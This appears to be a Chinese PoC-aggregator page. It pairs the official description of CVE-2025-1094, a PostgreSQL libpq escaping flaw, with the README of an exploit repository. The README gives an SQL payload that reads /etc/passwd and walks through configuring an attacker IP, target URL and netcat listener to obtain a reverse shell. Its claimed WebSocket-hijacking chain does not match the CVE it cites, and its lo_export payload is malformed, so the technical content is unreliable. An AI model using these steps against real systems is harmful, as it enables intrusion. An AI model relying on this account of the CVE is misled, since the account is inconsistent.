关联漏洞
标题:
PostgreSQL引用API在文本编码验证失败时未中和引用语法
(CVE-2025-1094)
描述:在 PostgreSQL 的 libpq 函数 PQescapeLiteral()、PQescapeIdentifier()、PQescapeString() 和 PQescapeStringConn() 中,对引用语法的不当中和允许数据库输入提供者在某些使用模式下实现 SQL 注入。具体来说,SQL 注入需要应用程序使用函数结果来构造 psql(PostgreSQL 交互终端)的输入。同样,在 PostgreSQL 命令行实用程序中,对引用语法的不当中和允许命令行参数的来源在客户端编码为 BIG5 且服务器编码为 EUC_TW 或 MULE_INTERNAL 时实现 SQL 注入。在 PostgreSQL 17.3、16.7、15.11、14.16 和 13.19 之前的版本中存在此问题。
描述
WebSocket and SQL Injection Exploit Script
介绍
# CVE-2025-1094: SQL Injection to RCE via WebSocket 🚀
This repository contains a proof of concept (PoC) exploit for **CVE-2025-1094**, a vulnerability in PostgreSQL that allows an SQL Injection (SQLi) attack to escalate to Remote Code Execution (RCE) through WebSocket hijacking.
## Overview
This exploit leverages an SQL Injection vulnerability in PostgreSQL to inject malicious code that reads sensitive files, such as `/etc/passwd`, and stores them on the vulnerable server. The exploit then hijacks an active WebSocket connection to execute arbitrary commands, ultimately achieving a remote shell on the compromised server.
## Vulnerability Details
- **CVE ID**: CVE-2025-1094
- **Vulnerable System**: PostgreSQL (misconfigured functions)
- **Exploit Path**: SQL Injection → WebSocket Hijacking → Remote Code Execution (RCE)
## How It Works
1. **SQL Injection (SQLi)**: The attack begins with injecting malicious SQL commands into a vulnerable PostgreSQL endpoint. The payload uses `lo_export` to read sensitive files from the server.
2. **WebSocket Hijacking**: The attacker hijacks an open WebSocket connection and sends a payload to execute the RCE. This triggers a reverse shell connection back to the attacker’s system.
3. **Remote Code Execution (RCE)**: The reverse shell provides the attacker full control over the server, allowing further exploitation.
## PoC (Proof of Concept)
```sql
SELECT lo_export( (SELECT convert_from(pg_read_file('/etc/passwd'), 'UTF8')), '/tmp/payload');
```
The above SQL payload reads the `/etc/passwd` file and saves it as `/tmp/payload`. Once the file is retrieved, the exploit uses WebSocket hijacking to establish a reverse shell.
## How to Use
1. Clone the repository:
```bash
git clone https://github.com/soltanali0/CVE-2025-1094.git
cd CVE-2025-1094
```
2. Modify the following variables in the script:
- `REVERSE_IP`: Your attacker's IP address
- `REVERSE_PORT`: The port on which your listener is running
- `TARGET_URL`: The vulnerable endpoint to attack
- `WEBSOCKET_URL`: The WebSocket URL to hijack
3. Run the script to exploit the vulnerability and establish a reverse shell.
4. Start your netcat listener on the specified port:
```bash
nc -lvnp <REVERSE_PORT>
```
## Mitigation
To protect against this vulnerability:
- **Use Prepared Statements**: Replace dynamic SQL queries with prepared statements.
- **Validate User Inputs**: Always validate and sanitize user inputs to prevent SQL Injection.
- **Restrict PostgreSQL Functions**: Limit access to functions like `lo_export` to trusted users only.
- **Secure WebSocket Connections**: Ensure WebSocket connections are authenticated and encrypted.
- **Keep PostgreSQL Updated**: Apply the latest security patches and review your PostgreSQL configuration.
## Disclaimer
This exploit is intended for educational purposes only. Ensure that you have explicit permission before testing any system with this exploit. Unauthorized access to computer systems is illegal.
文件快照
[4.0K] /data/pocs/dd0fddd7ec3a2a2efdeff6b4c3f7d88299550939
├── [1.7K] exploit.py
└── [3.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。